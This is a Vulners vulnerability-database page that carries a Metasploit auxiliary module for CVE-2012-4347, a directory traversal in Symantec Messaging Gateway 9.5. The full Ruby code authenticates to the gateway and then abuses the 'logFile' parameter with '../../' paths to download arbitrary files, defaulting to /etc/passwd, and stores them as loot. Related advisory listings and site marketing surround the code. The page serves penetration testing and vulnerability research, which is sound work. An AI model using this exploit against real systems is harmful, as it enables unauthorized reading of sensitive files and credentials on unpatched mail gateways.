Lucene search
K

Symantec Messaging Gateway 9.5 Log File Download Vulnerability

🗓️ 11 Dec 2012 00:09:29Reported by Ben Williams <[email protected]>, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 34 Views

Symantec Messaging Gateway 9.5 Log File Download Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-4347
29 May 201815:50
circl
Check Point Advisories
Symantec Messaging Gateway Directory Traversal (CVE-2012-4347)
16 Dec 201200:00
checkpoint_advisories
CVE
CVE-2012-4347
5 Dec 201211:00
cve
Cvelist
CVE-2012-4347
5 Dec 201211:00
cvelist
Dsquare
Symantec Messaging Gateway 9.5.3 File Disclosure
7 Dec 201200:00
dsquare
NVD
CVE-2012-4347
5 Dec 201211:57
nvd
Packet Storm
Symantec Messaging Gateway 9.5 Log File Download
1 Sep 202400:00
packetstorm
Prion
Directory traversal
5 Dec 201211:57
prion
Symantec
Symantec Messaging Gateway Security Issues
27 Aug 201208:00
symantec
Tenable Nessus
Symantec Messaging Gateway 9.5.x Multiple Vulnerabilities (SYM12-013)
7 Sep 201200:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Symantec Messaging Gateway 9.5 Log File Download Vulnerability',
      'Description'    => %q{
          This module will download a file of your choice against Symantec Messaging
        Gateway.  This is possible by exploiting a directory traversal vulnerability
        when handling the 'logFile' parameter, which will load an arbitrary file as
        an attachment.  Note that authentication is required in order to successfully
        download your file.
      },
      'References'     =>
        [
          ['CVE', '2012-4347'],
          ['EDB', '23110'],
          ['OSVDB', '88165'],
          ['BID', '56789'],
          ['URL', 'https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&suid=20120827_00&year=2012']
        ],
      'Author'         =>
        [
          'Ben Williams <ben.williams[at]ngssecure.com>',
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2012-11-30'
    ))

    register_options(
      [
        Opt::RPORT(41080),
        OptString.new('FILENAME', [true, 'The file to download', '/etc/passwd']),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with'])
      ])
  end

  def auth(username, password, sid, last_login)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => '/brightmail/login.do',
      'headers'   => {
        'Referer' => "http://#{peer}/brightmail/viewLogin.do"
      },
      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
      'vars_post' => {
        'lastlogin'  => last_login,
        'userLocale' => '',
        'lang'       => 'en_US',
        'username'   => username,
        'password'   => password,
        'loginBtn'   => 'Login'
      }
    })

    if res and res.headers['Location']
      new_uri = res.headers['Location'].scan(/^http:\/\/[\d\.]+:\d+(\/.+)/).flatten[0]
      res = send_request_cgi({
        'uri'    => new_uri,
        'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}"
      })

      return true if res and res.body =~ /Logged in as: #{username}/
    end

    return false
  end


  def get_login_data
    sid        = ''  #From cookie
    last_login = ''  #A hidden field in the login page

    res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'})
    if res and !res.get_cookies.empty?
      sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
    end

    if res
      last_login = res.body.scan(/<input type="hidden" name="lastlogin" value="(.+)"\/>/).flatten[0] || ''
    end

    return sid, last_login
  end


  def download_file(sid, fname)
    res = send_request_cgi({
      'uri'      => '/brightmail/export',
      'cookie'   => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
      'vars_get' => {
        'type'        => 'logs',
        'logFile'     => "../../#{fname}",
        'logType'     => '1',
        'browserType' => '1'
      }
    })

    if not res
      print_error("Unable to download the file. The server timed out.")
      return
    elsif res and res.body.empty?
      print_error("File not found or empty.")
      return
    end

    vprint_line
    vprint_line(res.body)

    f = ::File.basename(fname)
    p = store_loot('symantec.brightmail.file', 'application/octet-stream', rhost, res.body, f)
    print_good("File saved as: '#{p}'")
  end


  def run_host(ip)
    sid, last_login = get_login_data
    if sid.empty? or last_login.empty?
      print_error("Missing required login data.  Cannot continue.")
      return
    end

    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    if not auth(username, password, sid, last_login)
      print_error("Unable to login.  Cannot continue.")
      return
    else
      print_good("Logged in as '#{username}:#{password}'")
    end

    fname = datastore['FILENAME']
    download_file(sid, fname)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
7.2High risk
Vulners AI Score7.2
CVSS 25
EPSS0.5883
34